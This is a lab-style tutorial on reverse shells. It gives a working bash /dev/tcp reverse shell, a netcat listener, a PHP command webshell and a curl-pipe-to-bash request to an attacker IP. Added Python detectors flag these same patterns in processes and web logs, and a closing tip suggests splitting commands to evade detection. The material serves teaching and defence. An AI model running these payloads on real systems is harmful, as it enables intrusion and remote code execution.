Exploitation
Reverse Shell
Abstract
Summary
In ethical hacking, one technique involves uploading a script to a server to simulate remote command execution. This is often used in controlled environments for learning or penetration testing.
🛠️ Step-by-Step: Simulating a Reverse Shell in a Lab Environment
Step 1: Create a Shell Script
You can start by creating a basic shell script. This script is used to simulate a reverse connection from a target machine to your listener.
Instead of writing it all in one line, let’s break it down:
#!/bin/bash
# Start an interactive bash session whose standard output and standard
# error are redirected to a TCP connection (bash's /dev/tcp pseudo-device)
# and whose standard input is read back from that same connection.
# Comments cannot sit between backslash-continued lines (the continuation
# would join the comment onto the command), so the explanation stays here
# and the command itself is split across three lines:
#   line 1: the interactive shell
#   line 2: redirect stdout and stderr to the remote IP and port
#   line 3: redirect stdin from the same connection
bash -i \
  >& /dev/tcp/10.10.14.204/1337 \
  0>&1
⚠️ Note: This is for educational use only in a safe, isolated lab environment.
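From the defender's side, the script above leaves a recognisable trace on the host: the shell's file descriptors 0, 1 and 2 all point at the same socket instead of a pty. The following detector is an added example (not part of the original page) that checks process descriptors for exactly that condition. It assumes the Linux /proc layout (/proc/<pid>/comm and /proc/<pid>/fd) and runs first over constructed sample data, then over the live host if /proc is present.

```python
"""Flag shell processes whose stdin and stdout are attached to a socket.

A reverse shell such as `bash -i >& /dev/tcp/HOST/PORT 0>&1` leaves a shell
whose fds 0/1/2 resolve to `socket:[inode]` rather than `/dev/pts/N`.
On Linux this is visible through readlink on /proc/<pid>/fd/<n>.
"""
import os
import re
from dataclasses import dataclass, field

SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


@dataclass
class ProcInfo:
    pid: int
    comm: str                      # process name as in /proc/<pid>/comm
    fds: dict = field(default_factory=dict)  # fd number -> readlink target


def is_reverse_shell(proc: ProcInfo) -> bool:
    """True when a shell has both stdin (0) and stdout (1) on a socket."""
    if proc.comm not in SHELLS:
        return False
    return all(SOCKET_RE.match(proc.fds.get(fd, "")) for fd in (0, 1))


def find_suspicious(procs):
    """Return the pids of processes that look like reverse shells."""
    return [p.pid for p in procs if is_reverse_shell(p)]


def snapshot_procfs(proc_root="/proc"):
    """Best-effort walk of /proc on a live Linux host; unreadable pids skipped."""
    procs = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid = int(entry)
        fd_dir = f"{proc_root}/{pid}/fd"
        try:
            with open(f"{proc_root}/{pid}/comm") as f:
                comm = f.read().strip()
            fds = {}
            for fd in os.listdir(fd_dir):
                try:
                    fds[int(fd)] = os.readlink(f"{fd_dir}/{fd}")
                except OSError:
                    pass  # fd closed between listdir and readlink
        except OSError:
            continue  # process exited or not readable (permissions)
        procs.append(ProcInfo(pid, comm, fds))
    return procs


# Constructed sample data (not captured from a real host): a normal shell on
# a pty, a shell whose standard streams all share one socket, a web server
# that legitimately holds a listening socket on a high fd, and a cron-style
# shell reading from pipes.
SAMPLE_PROCS = [
    ProcInfo(1201, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    ProcInfo(1337, "bash", {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}),
    ProcInfo(1402, "nginx", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 6: "socket:[30001]"}),
    ProcInfo(1500, "sh", {0: "pipe:[5551]", 1: "pipe:[5552]", 2: "/dev/null"}),
]

if __name__ == "__main__":
    print("sample data:", find_suspicious(SAMPLE_PROCS))
    if os.path.isdir("/proc"):
        print("live host:", find_suspicious(snapshot_procfs()))
```

Only the process whose stdin and stdout both sit on a socket is flagged; a server holding a listening socket on some other descriptor is not, and neither is a shell driven through pipes. The same check is what auditd or EDR rules look for when they alert on "shell with socket as stdin", and it also catches the same shape of process when it is started by a webshell, since the PHP parent then shows a shell child with those descriptors.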
Step 2: Set Up a Listener on Your Machine
To receive the connection, you need to open a listening port on your machine. This is done using netcat:
# Listen on port 1337
nc -nvlp 1337
This command tells your system to wait for incoming connections on port 1337.
Step 3: Upload a Web Script to the Target
In a test environment, you might simulate uploading a script to a web server. Here’s an example of a very basic PHP script that can execute commands:
<?php
// This script executes a command passed via the "cmd" URL parameter
system($_GET["cmd"]);
?>
🧠 Tip: Always test this in a controlled lab. Never deploy such scripts on production systems.
Step 4: Trigger the Script via a Web Request
To execute the uploaded script, you can simulate a browser request like this:
http://<target-ip>/shell.php?cmd=curl%20http://10.10.14.204:8000/shell.sh|bash
This tells the target to download and execute the shell script from your machine.
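Steps 3 and 4 together describe the pattern a web server log records when a command-execution script is used: a request to an uploaded .php file with a command-style parameter whose decoded value fetches a script and pipes it into a shell. The detector below is an added example (not from the original page) that parses common-log-format lines, URL-decodes the query string before matching (so `%20` and similar encodings do not hide the payload), and reports why each request was flagged. The log lines are constructed to mirror the request in Step 4.

```python
"""Scan web access logs for webshell-style requests.

Two independent signals are reported: a command-style parameter name
(cmd, command, exec, c) and, after URL decoding, a value that downloads
a script and pipes it to a shell or opens a /dev/tcp connection.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Common log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

COMMAND_PARAMS = {"cmd", "command", "exec", "c"}
# curl/wget ... | sh or | bash (download-and-execute)
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.IGNORECASE)
# bash's /dev/tcp pseudo-device, as in the reverse shell script above
DEV_TCP = re.compile(r"/dev/tcp/", re.IGNORECASE)


def analyse_request(path: str):
    """Return a list of reasons a request path looks like webshell use."""
    parts = urlsplit(path)
    # parse_qs percent-decodes values, so matching happens on the real payload
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for name, values in params.items():
        if name.lower() in COMMAND_PARAMS:
            reasons.append(f"command-style parameter '{name}'")
        for value in values:
            if DOWNLOAD_EXEC.search(value):
                reasons.append(f"download-and-execute pattern in '{name}'")
            if DEV_TCP.search(value):
                reasons.append(f"/dev/tcp reverse-shell pattern in '{name}'")
    return reasons


def scan_log(text: str):
    """Parse each log line and return the flagged requests with their reasons."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        reasons = analyse_request(m["path"])
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                         "status": int(m["status"]), "reasons": reasons})
    return hits


# Constructed sample log (not a real capture); the third line mirrors the
# request shown in Step 4, the last line is a benign search containing "curl".
SAMPLE_LOG = """\
10.10.14.204 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
10.10.14.204 - - [01/Jan/2024:10:00:05 +0000] "POST /upload.php HTTP/1.1" 200 88
10.10.14.204 - - [01/Jan/2024:10:00:09 +0000] "GET /uploads/shell.php?cmd=curl%20http://10.10.14.204:8000/shell.sh|bash HTTP/1.1" 200 0
10.10.14.204 - - [01/Jan/2024:10:00:12 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 39
192.168.1.5 - - [01/Jan/2024:10:00:20 +0000] "GET /search.php?q=curl%20recipes HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["path"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

The benign search request is not flagged even though its value contains `curl`, because the download-and-execute rule requires the pipe into a shell; the plain `cmd=id` request is still reported on the parameter name alone. Decoding before matching is the important design choice: a rule that looks for the literal string `curl http` would miss `curl%20http`. On the prevention side, the root cause in Step 3 is that an upload directory is served with PHP execution enabled; serving uploads from a location where the interpreter is disabled removes the execution path regardless of what the file contains.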
✅ Final Notes
- Break down commands to avoid detection and improve understanding.
- Always use these techniques in ethical hacking labs or CTF environments.
- Never use these methods on unauthorized systems.